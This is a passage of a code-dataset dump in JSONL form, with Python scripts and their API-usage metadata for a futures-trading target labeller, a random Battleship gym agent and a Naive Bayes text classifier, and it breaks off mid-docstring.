"usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 83, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 83, "usage_type": "attribute"}, {"api_name": "h5py.File", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.in1d", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 95, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 97, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 97, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 99, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 102, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 105, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.MultiIndex.from_arrays", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 107, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.invert", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.in1d", "line_number": 111, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 114, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "pygwas_modules.kinship.calc_ibs_kinship", "line_number": 117, "usage_type": "call"}, {"api_name": "pygwas_modules.kinship", "line_number": 117, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 150, "usage_type": "call"}, {"api_name": "scipy.array", "line_number": 182, "usage_type": "call"}, {"api_name": "scipy.std", "line_number": 184, "usage_type": "call"}, {"api_name": "scipy.arange", "line_number": 188, "usage_type": "call"}, {"api_name": "scipy.log", "line_number": 191, "usage_type": "call"}, {"api_name": "scipy.stats.shapiro", "line_number": 194, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 194, "usage_type": "name"}, {"api_name": "scipy.isfinite", "line_number": 195, "usage_type": "call"}, {"api_name": "scipy.argmax", "line_number": 201, "usage_type": "call"}, {"api_name": "scipy.log", "line_number": 204, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 208, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 208, "usage_type": "attribute"}, {"api_name": "numpy.vstack", "line_number": 217, "usage_type": "call"}, {"api_name": "scipy.ones", "line_number": 263, "usage_type": "call"}, {"api_name": "scipy.zeros", "line_number": 264, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 268, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 268, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 269, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 269, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 270, "usage_type": "call"}, {"api_name": "limix.qtl.qtl_test_interaction_lmm_kronecker", "line_number": 271, "usage_type": "call"}, {"api_name": "limix.qtl", "line_number": 271, "usage_type": "name"}, {"api_name": "time.time", "line_number": 275, "usage_type": "call"}, {"api_name": 
"sys.stdout.write", "line_number": 276, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 276, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 280, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 280, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 281, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 281, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 282, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 283, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 283, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 284, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 284, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 286, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 286, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 287, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 287, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 288, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 297, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 297, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 298, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.str", "line_number": 301, "usage_type": "attribute"}, {"api_name": "pygwas_modules.result.GWASResult", "line_number": 303, "usage_type": "call"}, {"api_name": "pygwas_modules.result", "line_number": 303, "usage_type": "name"}, {"api_name": "numpy.str", "line_number": 303, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 304, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 308, "usage_type": "call"}, {"api_name": "os.path", "line_number": 308, "usage_type": "attribute"}, {"api_name": "pygwas_modules.plotting.plot_gwas_result", "line_number": 309, "usage_type": "call"}, {"api_name": "pygwas_modules.plotting", "line_number": 309, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 309, "usage_type": "call"}, {"api_name": "os.path", "line_number": 309, "usage_type": "attribute"}, {"api_name": "pygwas_modules.plotting.plot_qq", "line_number": 311, "usage_type": "call"}, {"api_name": "pygwas_modules.plotting", "line_number": 311, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 311, "usage_type": "call"}, {"api_name": "os.path", "line_number": 311, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 312, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 312, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 312, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 315, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 315, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 316, "usage_type": "call"}, {"api_name": "pygwas_modules.result.GWASResult", "line_number": 317, "usage_type": "call"}, {"api_name": "pygwas_modules.result", "line_number": 317, "usage_type": "name"}, {"api_name": "numpy.str", "line_number": 317, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 318, "usage_type": 
"attribute"}, {"api_name": "os.path.join", "line_number": 322, "usage_type": "call"}, {"api_name": "os.path", "line_number": 322, "usage_type": "attribute"}, {"api_name": "pygwas_modules.plotting.plot_gwas_result", "line_number": 323, "usage_type": "call"}, {"api_name": "pygwas_modules.plotting", "line_number": 323, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 323, "usage_type": "call"}, {"api_name": "os.path", "line_number": 323, "usage_type": "attribute"}, {"api_name": "pygwas_modules.plotting.plot_qq", "line_number": 325, "usage_type": "call"}, {"api_name": "pygwas_modules.plotting", "line_number": 325, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 325, "usage_type": "call"}, {"api_name": "os.path", "line_number": 325, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 326, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 326, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 326, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 329, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 329, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 330, "usage_type": "call"}, {"api_name": "pygwas_modules.result.GWASResult", "line_number": 331, "usage_type": "call"}, {"api_name": "pygwas_modules.result", "line_number": 331, "usage_type": "name"}, {"api_name": "numpy.str", "line_number": 331, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 332, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 336, "usage_type": "call"}, {"api_name": "os.path", "line_number": 336, "usage_type": "attribute"}, {"api_name": "pygwas_modules.plotting.plot_gwas_result", "line_number": 337, "usage_type": "call"}, {"api_name": "pygwas_modules.plotting", "line_number": 337, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 337, "usage_type": "call"}, {"api_name": "os.path", "line_number": 337, "usage_type": "attribute"}, {"api_name": "pygwas_modules.plotting.plot_qq", "line_number": 339, "usage_type": "call"}, {"api_name": "pygwas_modules.plotting", "line_number": 339, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path", "line_number": 339, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 340, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 340, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 340, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 341, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 341, "usage_type": "attribute"}, {"api_name": "genehunter.core.GeneAnnotationDbExtractor.GeneAnnotationDbExtractor", "line_number": 345, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 346, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 346, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 355, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 357, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 386, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 386, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 390, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 397, "usage_type": "call"}, {"api_name": "pandas.concat", 
"line_number": 425, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 432, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 462, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 464, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 464, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 473, "usage_type": "call"}, {"api_name": "os.path", "line_number": 473, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 476, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 480, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 480, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 481, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 482, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 483, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 484, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 485, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 486, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 487, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 488, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 489, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 490, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 491, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 493, "usage_type": "call"}, {"api_name": "argparse.Namespace", "line_number": 496, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 497, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 500, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 500, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 501, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 501, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 502, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 502, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 503, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 503, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 504, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 504, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 505, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 505, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 506, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 506, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 507, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 507, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 508, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 508, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 509, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 509, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 510, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 510, "usage_type": "attribute"}, {"api_name": "{'stats': 'scipy.stats'}", "line_number": 517, "usage_type": "call"}, {"api_name": "{'stats': 'scipy.stats'}", "line_number": 531, 
"usage_type": "call"}, {"api_name": "os.path.join", "line_number": 536, "usage_type": "call"}, {"api_name": "os.path", "line_number": 536, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 537, "usage_type": "call"}, {"api_name": "os.path", "line_number": 537, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 539, "usage_type": "call"}, {"api_name": "os.path", "line_number": 539, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 541, "usage_type": "call"}, {"api_name": "os.path", "line_number": 541, "usage_type": "attribute"}]} +{"seq_id": "531873472", "text": "import pandas as pd\nimport numpy as np\nimport datetime\nfrom pandas.tseries.holiday import USFederalHolidayCalendar as calendar\nimport configparser\nimport warnings\nimport feather\nimport time\nfrom multiprocessing import Pool, Process\nimport ast\nimport dask.dataframe as dd\nimport gc\nimport re\n\nimport sys\n\nstart_time = time.time()\n\n\nconfig = configparser.ConfigParser()\nconfig.read('/home/melgazar9/Trading/TD/Scripts/Trading-Scripts/Multi-Product/scripts/CL/CL_Create_Target.ini')\n\nstrong_buy_actual = float(config['PARAMS']['strong_buy_actual'])\nmed_buy_actual = float(config['PARAMS']['med_buy_actual'])\nno_trade_actual = float(config['PARAMS']['no_trade_actual'])\nmed_sell_actual = float(config['PARAMS']['med_sell_actual'])\nstrong_sell_actual = float(config['PARAMS']['strong_sell_actual'])\nstop_actual = float(config['PARAMS']['stop_actual'])\n\nstrong_buy_HL = float(config['PARAMS']['strong_buy_HL'])\nmed_buy_HL = float(config['PARAMS']['med_buy_HL'])\nno_trade_HL = float(config['PARAMS']['no_trade_HL'])\nmed_sell_HL = float(config['PARAMS']['med_sell_HL'])\nstrong_sell_HL = float(config['PARAMS']['strong_sell_HL'])\nstop_HL = float(config['PARAMS']['stop_HL'])\n\nstrong_cap_actual = float(config['PARAMS']['strong_cap_actual'])\nmed_cap_actual = float(config['PARAMS']['med_cap_actual'])\nstrong_cap_HL = float(config['PARAMS']['strong_cap_HL'])\nmed_cap_HL = float(config['PARAMS']['med_cap_actual'])\n\nthreshold = float(config['PARAMS']['threshold'])\n\nActual_Move = config['PARAMS']['Actual_Move']\nActual_HighMove = config['PARAMS']['Actual_HighMove']\nActual_LowMove = config['PARAMS']['Actual_LowMove']\n\n\n\nif config['PATH']['df_path'].endswith('.feather'):\n df = pd.read_feather(config['PATH']['df_path'])\nelif config['PATH']['df_path'].endswith('.feather'):\n df = dd.read_parquet(config['PATH']['df_path'], low_memory=False).compute()\nelif config['PATH']['df_path'].endswith('.csv'):\n df = pd.read_csv(config['PATH']['df_path'], low_memory=False)\n\n\ndf.set_index('Datetime', inplace=True)\ndf.sort_index(inplace=True)\n\nresample_period = list(re.findall('\\d+', Actual_Move))[0] + 'min'\ndf_tmp = df.resample(resample_period)\ntmp_actualMove = df_tmp[Actual_Move.replace('Actual', 'Prev')].shift(-1)\ntmp_actualMove.name = Actual_Move\ntmp_actualHighMove = df_tmp[Actual_HighMove.replace('Actual', 'Prev')].shift(-1)\ntmp_actualHighMove.name = Actual_HighMove\ntmp_actualLowMove = df_tmp[Actual_LowMove.replace('Actual', 'Prev')].shift(-1)\ntmp_actualLowMove.name = Actual_LowMove\ntmp = pd.merge_asof(tmp_actualMove, tmp_actualHighMove, left_index = True, right_index = True)\ntmp = pd.merge_asof(tmp, tmp_actualLowMove, left_index = True, right_index = True)\ndf = pd.merge_asof(df, tmp, left_index = True, right_index = True)\ndel df_tmp, resample_period, tmp_actualMove, tmp_actualHighMove, tmp_actualLowMove, 
tmp\n\nprint(df.head())\nprint(df.shape)\n\nclass CalcTarget():\n\n def __init__(self, df, strong_buy, med_buy, no_trade, med_sell, strong_sell, threshold, stop):\n\n self.df = df\n self.strong_buy = strong_buy\n self.med_buy = med_buy\n self.no_trade = no_trade\n self.med_sell = med_sell\n self.strong_sell = strong_sell\n self.threshold = threshold # to prevent data errors\n self.stop = stop\n\n def calc_target_actual(self):\n\n super().__init__()\n\n# self.df[Actual_Move] = self.df['Prev' + Actual_Move.strip('Actual')].shift(-1)\n\n # strong buy\n self.df.loc[(self.df[Actual_Move] >= self.strong_buy) & (self.df[Actual_Move] <= self.threshold) & (self.df[Actual_LowMove] > (-1)*self.stop), 'Target_Actual'] = 4\n\n # medium buy\n self.df.loc[(self.df[Actual_Move] >= self.med_buy) & (self.df[Actual_Move] <= self.strong_buy) & (self.df[Actual_LowMove] > (-1)*self.stop) & (self.df['Target_Actual'] != 4), 'Target_Actual'] = 3\n\n # medium sell\n self.df.loc[(self.df[Actual_Move] <= (-1) * self.med_sell) & (self.df[Actual_Move] >= (-1) * self.strong_sell) & (self.df[Actual_LowMove] < self.stop) & (self.df['Target_Actual'] != 4) & (self.df['Target_Actual'] != 3), 'Target_Actual'] = 1\n\n # strong sell\n self.df.loc[(self.df[Actual_Move] <= (-1) * self.strong_sell) & (self.df[Actual_Move] >= (-1) * self.threshold) & (self.df[Actual_LowMove] < self.stop) & (self.df['Target_Actual'] != 4) & (self.df['Target_Actual'] != 3) & (self.df['Target_Actual'] != 1), 'Target_Actual'] = 0\n\n self.df.loc[(self.df['Target_Actual'] != 0) & (self.df['Target_Actual'] != 1) & (self.df['Target_Actual'] != 3) & (self.df['Target_Actual'] != 4), 'Target_Actual'] = 2\n\n# return pd.DataFrame(lst, index=self.df.index).rename(columns={0:'Target_Actual'})\n# return pd.DataFrame(lst, index=self.df[[Actual_Move]].dropna().index).rename(columns={0:'Target_Actual'})\n return df\n\n\n def calc_target_HL(self):\n\n # stop means how much heat I am willing to take per trade\n # i.e. 
if the move went up in my favor $50 but I took $1000 worth of heat that isn't good\n # hm stands for high move, lm stands for low move\n\n# if np.isnan(self.df[Actual_LowMove]) or np.isnan(self.df[Actual_HighMove])\n\n # if ActualHM >= buy signal AND ActualLM doesn't go below stop\n # Strong Buy\n self.df.loc[(self.df[Actual_HighMove] >= self.strong_buy) & (self.df[Actual_LowMove] >= (-1)*self.stop), 'Target_HL'] = 4\n\n # Strong Sell\n self.df.loc[(self.df[Actual_LowMove] <= (-1)*self.strong_sell) & (self.df[Actual_HighMove] <= self.stop) & (self.df['Target_HL'] != 4), 'Target_HL'] = 0\n\n # Medium Buy\n self.df.loc[(self.df[Actual_HighMove] >= self.med_buy) & (self.df[Actual_LowMove] >= (-1)*self.stop) & (self.df['Target_HL'] != 4) & (self.df['Target_HL'] != 0), 'Target_HL'] = 3\n\n # Medium Sell\n self.df.loc[(self.df[Actual_LowMove] <= (-1)*self.med_sell) & (self.df[Actual_HighMove] <= self.stop) & (self.df['Target_HL'] != 4) & (self.df['Target_HL'] != 0) & (self.df['Target_HL'] != 3), 'Target_HL'] = 1\n\n self.df.loc[(self.df['Target_HL'] != 0) & (self.df['Target_HL'] != 1) & (self.df['Target_HL'] != 3) & (self.df['Target_HL'] != 4), 'Target_HL'] = 2\n# return pd.DataFrame(lst, index=self.df.resample('60min').first().index).rename(columns={0:'Target_HL'})\n# return pd.DataFrame(lst, index=self.df[[Actual_Move]].dropna().index).rename(columns={0:'Target_HL'})\n return df\n\nif config['PARAMS']['create_target_Actual_ON'] == 'TRUE':\n\n df_target_actual = CalcTarget(df, strong_buy=strong_buy_actual, med_buy=med_buy_actual, no_trade=no_trade_actual,\n med_sell=med_sell_actual, strong_sell=strong_sell_actual, threshold=threshold,\n stop=stop_actual).calc_target_actual()\n for i in range(int(config['PARAMS']['min_target_lookback']), int(config['PARAMS']['max_target_lookback']), int(config['PARAMS']['target_lookback_increment'])):\n df_target_actual['PrevTarget_ActMove' + str(i)] = df_target_actual['Target_Actual'].shift(i)\n\n df = df_target_actual.fillna(2).astype('int')\n\n print(df['Target_Actual'].value_counts())\n\nif config['PARAMS']['create_target_HL_ON'] == 'TRUE':\n\n df_target_HL = CalcTarget(df, strong_buy=strong_buy_HL, med_buy=med_buy_HL, no_trade=no_trade_HL,\n med_sell=med_sell_HL, strong_sell=strong_sell_HL, threshold=threshold,\n stop=stop_HL).calc_target_HL()\n\n\n print(df_target_HL['Target_HL'].value_counts())\n\n for i in range(int(config['PARAMS']['min_target_lookback']), int(config['PARAMS']['max_target_lookback']), int(config['PARAMS']['target_lookback_increment'])):\n df_target_HL['PrevTarget_HL' + str(i)] = df_target_HL['Target_HL'].shift(i)\n\n df = df_target_HL.fillna(2).astype('int')\n\n print(df['Target_HL'].value_counts())\n", "sub_path": "Trading/scripts/Live-Trading/Create_Target.py", "file_name": "Create_Target.py", "file_ext": "py", "file_size_in_byte": 7842, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.time", "line_number": 17, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_feather", "line_number": 51, "usage_type": "call"}, {"api_name": "dask.dataframe.read_parquet", "line_number": 53, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 53, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 55, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.merge_asof", "line_number": 69, "usage_type": 
"call"}, {"api_name": "pandas.merge_asof", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.merge_asof", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "36199712", "text": "import gym\nimport coding_challenge\nimport numpy as np\n\nenv = gym.make('Battleship-v0')\nstate = env.reset()\nterminal = False\nwhile not terminal:\n action = np.random.rand(2)\n state, reward, terminal, info = env.step(action)\n print(info['game_message'])\n", "sub_path": "random_agent/random_agent.py", "file_name": "random_agent.py", "file_ext": "py", "file_size_in_byte": 260, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "gym.make", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 9, "usage_type": "attribute"}]} +{"seq_id": "7218190", "text": "import os\nimport numpy as np\nfrom collections import defaultdict\nimport pandas as pd\nimport random\n\nos.chdir('C://Users/wanyu/Documents/Computational Linguilistics/PA2/github')\n\n\nclass NaiveBayes():\n\n def __init__(self, train_df, test_df):\n \n self.train_df = train_df\n self.test_df = test_df\n self.train_data = {}\n self.class_dict = {}\n self.feature_dict = {}\n self.V = {}\n self.V_unique = []\n self.class_count = []\n self.word_count = []\n self.feature_ratio = None\n self.prior = None\n self.likelihood = None\n self.label_col = None\n self.text_col = None\n \n \n \n def preprocess_text(self, text):\n \"\"\"\n Transform text data into a series of token words\n \"\"\"\n # Remove new lines and concatenate each line into a string \n text = ''.join(text.splitlines())\n # Transform a document into a series of token words\n text = text.split(' ')\n # Remove noncharacters\n text = [i for i in text if i.isalpha()]\n \n return text\n\n\n\n def get_train_data(self, label_col, text_col, class_dict=None):\n \n \"\"\"\n Stores all documents and words as class instances\n Compute the number of documents in each class,\n And the number of words in each document simultaneously\n \"\"\"\n \n self.label_col = label_col\n self.text_col = text_col\n \n self.class_dict = class_dict\n \n if class_dict == None:\n self.class_dict = {c_index: word \n for c_index, word \n in enumerate(self.train_df[self.label_col].unique())}\n \n \n for c_index, c_name in self.class_dict.items():\n document_list = []\n word_list = []\n \n for document in self.train_df.loc[self.train_df[self.label_col] == c_name, self.text_col]:\n document = self.preprocess_text(document)\n document_list.append(document)\n word_list.extend(document)\n \n self.train_data[c_index] = document_list \n self.V[c_index] = word_list \n # Compute the number of documents in each class\n self.class_count.append(len(document_list))\n # Compute the number of words in each class\n self.word_count.append(len(word_list))\n \n self.class_count = np.matrix(self.class_count).reshape(len(self.class_dict),1)\n self.word_count = np.matrix(self.word_count).reshape(len(self.class_dict),1) \n \n \n \n def potential_features(self, freq=0.0002, num_f=50):\n \"\"\"\n Selects some potential features that might be useful to classify\n based on the likelihood ratio:\n LR(w) = max (P(w|c1) / P(w|c2), P(w|c2) / P(w|c1)) \n \"\"\"\n \n # Calculate a frequency for each word and each class\n for key, value in self.V.items():\n self.V[key] = pd.Series(value).value_counts()\n \n # Combine two Series based on word indices\n df = 
pd.DataFrame(self.V).fillna(1)\n word_index = np.array(df.index)\n mat = np.matrix(df)\n \n # Calculate conditional probabilites for each word\n mat = np.divide(mat, mat.sum(axis=0))\n \n # Choose words with higher frequencies and stores their position\n # We can set a frequency rate in the function. The default is 0.0002.\n h_freq = np.where(np.sum(mat > freq, axis=1) != 0)[0]\n \n # Compute the likelihodd ratio\n \n ratio_name = []\n \n LR = np.zeros((mat.shape[0],1))\n for i in range(mat.shape[1]):\n for j in range(mat.shape[1]):\n if i == j: continue\n LR = np.c_[LR, mat[:,i]/mat[:,j]]\n name = self.class_dict[i] + '_' + self.class_dict[j]\n ratio_name.append(name)\n \n # Choose words based on the values of LR\n # We can set the number of candidates in our function.\n # The default is 50.\n \n top_LR_index = LR[h_freq].max(axis=1).argsort(axis=0)[:-(num_f+1):-1]\n candidate = word_index[h_freq][top_LR_index].reshape(1,num_f).tolist()\n\n column_name = list(self.class_dict.values()) + ratio_name \n self.feature_ratio = pd.DataFrame(np.c_[mat,LR[:, 1:]], \n columns = column_name,\n index = word_index)\n \n return candidate[0]\n \n\n def get_key(self, my_dict, val): \n \"\"\"\n Get the key by value in dictionary.\n \"\"\"\n for key, value in my_dict.items(): \n if val == value: \n return key \n\n\n def get_feature_dict(self, feature_list):\n \n feature_dict = { i: feature_list[i] \n for i in range(len(feature_list))} \n \n return feature_dict\n\n\n def train(self, feature_list):\n \"\"\"\n Trains a multinomial Naive Bayes classifier on a training set.\n Specifically, fills in self.prior and self.likelihood such that:\n self.prior[class] = log(P(class))\n self.likelihood[class][feature] = log(P(feature|class))\n \"\"\"\n # Define the features dictionary to train\n self.feature_dict = self.get_feature_dict(feature_list)\n \n # Compute the number of features in each document\n features_count = np.ones((len(self.class_dict), \n len(self.feature_dict)))\n \n\n for class_idx, class_docs in self.train_data.items():\n for document in class_docs:\n for word in document:\n if word in self.feature_dict.values():\n feature_index = self.get_key(self.feature_dict, word)\n features_count[class_idx][feature_index] += 1\n\n # Get unique words in all documents\n if self.V_unique == []:\n for w_df in self.V.values():\n word_list = list(w_df.index)\n self.V_unique.extend(word_list)\n #print(type(w_list))\n self.V_unique = list(set(self.V_unique))\n \n\n # normalize counts to probabilities, and take logs\n self.prior = np.log(self.class_count/np.sum(self.class_count))\n self.likelihood = np.log(np.divide(features_count, self.word_count+len(self.V_unique)))\n\n\n def test(self, data=0):\n \"\"\"\n Tests the classifier on a development or test set.\n Returns a dictionary of filenames mapped to their correct \n and predicted classes such that:\n results[fileID]['correct'] = correct class\n results[fileID]['predicted'] = predicted class\n \"\"\"\n \n results = defaultdict(dict)\n \n if data == 0:\n data = self.test_df\n \n\n for c_index, c_name in self.class_dict.items():\n \n for document in data.loc[data[self.label_col] == c_name, self.text_col]:\n document = self.preprocess_text(document)\n feature_count = np.zeros((len(self.feature_dict), 1))\n \n for word in document:\n if word in self.feature_dict.values():\n feature_index = list(self.feature_dict.values()).index(word)\n feature_count[feature_index] += 1\n \n class_prob = self.prior + self.likelihood.dot(feature_count)\n class_pred = 
int(class_prob.argmax(axis=0))\n results[len(results)]= {'correct': c_index,\n 'predicted': class_pred}\n \n return results\n\n\n def confusion_matrix(self, results):\n \"\"\"\n Compute a confusion matrix based on results produced from test()\n \"\"\"\n confusion_matrix = np.zeros((len(self.class_dict),\n len(self.class_dict)))\n \n for doc in results.values():\n confusion_matrix[doc['correct'], doc['predicted']] +=1\n \n return confusion_matrix \n \n \n def evaluate(self, results):\n \"\"\"\n Given results, calculates the following metrics:\n Precision, Recall, F1 for each class, and overall Accuracy\n Return an evaluation metrics in a DataFrame format.\n \"\"\"\n \n confusion_matrix = self.confusion_matrix(results)\n \n indicator = pd.Series(['Class', 'Accuracy', 'Precision', \n 'Recall', 'F1'])\n \n performance = []\n \n for i in range(2):\n class_name = self.class_dict[i]\n accuracy = round(np.sum(confusion_matrix.diagonal()) / np.sum(confusion_matrix), 3)\n precision = round(confusion_matrix[i,i] / np.sum(confusion_matrix[:,i]), 3)\n recall = round(confusion_matrix[i,i] / np.sum(confusion_matrix[i]), 3)\n f1_score = round((2*precision*recall) / (precision+recall), 3)\n performance.append([class_name, accuracy, precision, recall, f1_score])\n \n performance = pd.DataFrame(np.array(performance), columns=indicator).set_index('Class')\n\n return performance\n\n\n\n\n def select_features(self, feature_list, method = 'forward', \n random_select = True, max_features = 10, \n min_features = 10, metric = 'Accuracy', \n class_index = 0, show_process = False, \n print_mode = True):\n \n \"\"\"\n Performs a process of feature selection\n Returns a set of features and evaluation with the best performance\n \n Here, there are two methods used for selecting features:\n - Forward Method: \n Begins with an empty model and adds in one feature at each step.\n If the performance is better, then keep it. Otherwise, drop it.\n \n - Backward Method:\n Begins with all the features 